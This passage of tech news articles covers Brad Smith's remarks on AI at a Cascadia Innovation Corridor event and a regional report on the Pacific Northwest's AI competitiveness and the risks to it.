That was a theme during Tuesday’s event. Former Washington Gov. Chris Gregoire, who leads the Cascadia Innovation Corridor group, kicked off the day by calling AI “a defining technology of our generation.”

Smith, who in his three decades at Microsoft has witnessed tech bubbles and bursts, also offered a “breadth of perspective” on AI that he hinted might be lacking in Silicon Valley.

“In so many ways, the sky is the limit,” Smith said. “That is exciting, but I don’t want to just be another tech bro who says, ‘Hey, great, here it comes. Get ready, get out your wallet.'”

AI-driven employment threats are becoming increasingly real in the tech sector and beyond. Amazon on Tuesday announced a huge round of layoffs, slashing 14,000 corporate and tech jobs. Earlier this year Microsoft laid off 15,000 employees worldwide. The cuts aren’t all tied to AI, but many executives are talking about worker efficiency gains thanks to the tech.

Despite the recent layoffs, many industry and elected leaders in the Cascadia region, which stretches from Vancouver, B.C., through Seattle and down to Portland, see AI as a promising economic engine that can build on the area’s strong tech foundation. That includes Microsoft and Amazon as well as a growing slate of AI startups, plus institutions such as the University of Washington, University of British Columbia, Allen Institute for AI and others.

But Smith — who manages to strike a persona blending tech evangelist, politician and favorite uncle — also acknowledged concerns about disparities in AI access, whether looking locally at rural versus urban divides, or the gap between AI use in affluent and low-income countries that lack widespread electricity and internet connections.

He also tackled the meta questions around the responsible use of AI and encouraged society to get out in front of the technology with appropriate guardrails.

“What are we trying to do as an industry, as a region, as a planet, as a species? Are we trying to build machines that are better than people? Are we trying to build machines that will help people become smarter and better?” he asked.

“If the experience that we’ve all had with social media over the last 15 years teaches us anything at all,” Smith continued, “it is that the best time to ask these questions and to debate them is before technology answers them for us.”


Cascadia’s AI paradox: A world-leading opportunity threatened by rising costs and a talent crunch

28 October 2025 at 10:00
The downtown Seattle skyline. (GeekWire Photo / Lisa Stiffler)

A new report exploring the potential for the Pacific Northwest to stake its claim as the global leader in responsible AI offers a paradoxical view. The Cascadia region, which includes Seattle, Portland and Vancouver, B.C., is described as a proven, promising player in the sphere — but with significant risks that threaten its success.

“We created companies that transformed global commerce,” writes former Gov. Chris Gregoire in a foreword to the document. “Now we have the chance to add another chapter — one where Cascadia becomes the world’s standard-bearer for innovation that uplifts both people and planet.”

The Cascadia Innovation Corridor, which Gregoire chairs, released the report this morning as it kicks off its two-day conference. The economic advocacy group’s eighth annual event is being held in Seattle.

The study is built on an analysis by the Boston Consulting Group that ranks Cascadia’s three metro areas against 15 comparable regions in the U.S. and Canada for their economic competitiveness, including livability, workforce, and business and innovation climate. Seattle came in fourth behind Boston, Austin and Raleigh, while Portland ranked 13th and Vancouver 14th.

Over the past decade, the region’s gross domestic product and populations have both grown significantly, and when combined, their economies approach the 18th largest in the world.

Cascadia’s strengths, the report explains, include tech engines such as cloud giants Microsoft and Amazon in Washington, silicon chip manufacturing in Oregon, and quantum innovation in Vancouver, as well as academic excellence from the University of Washington, University of British Columbia and Oregon State University.

But as time goes on and as business and civic leaders aim for the prize of AI dominance, cracks in the system are increasingly troubling.

  • Business costs are rising and there are mounting regulatory concerns — but it’s a tricky picture. Seattle, for example, often turns to B&O and headcount taxes to cover costs, while the state struggles to balance budgets in the absence of an income tax.
  • Housing affordability is continuing to decline for many residents in these metro areas.
  • Skilled tech workers are leaving Portland, in particular, and Seattle relies heavily on foreign workers receiving H-1B visas, which are less certain under the Trump administration.
  • The clean, affordable energy that was once abundant in the Pacific Northwest is decreasingly available as droughts reduce river flows that drive hydropower dams and electricity demand increases with rapid data center growth.

The report notes that multiple regions around the U.S. and Canada have created AI-focused hubs with hundreds of millions of dollars in public and private funding to bolster their hold on the sector.

New Jersey has a half-billion dollar “AI Moonshot” program including tax incentives and public-worker AI training programs; New York’s “Empire AI Consortium” has an AI computing training center at the University of Buffalo and startup supports; and California has a public-private task force to increase AI adoption within government services and connect tech leaders with state agencies.

For its part, Seattle Mayor Bruce Harrell announced a “responsible AI plan” this fall that provides guidelines for the municipality’s use of artificial intelligence and its support of the AI tech sector as an economic driver, which includes the earlier launches of the startup-focused AI House and Foundations.

But what the region really needs to succeed is a collaborative effort tapping all of the metro areas’ assets.

“For Cascadia, the lesson is clear: without a coordinated strategy that links our strengths in cloud computing, semiconductors, and research, we risk falling behind,” states the Cascadia Innovation Corridor report. “Acting together, we can position Cascadia not just to keep pace, but to lead.”
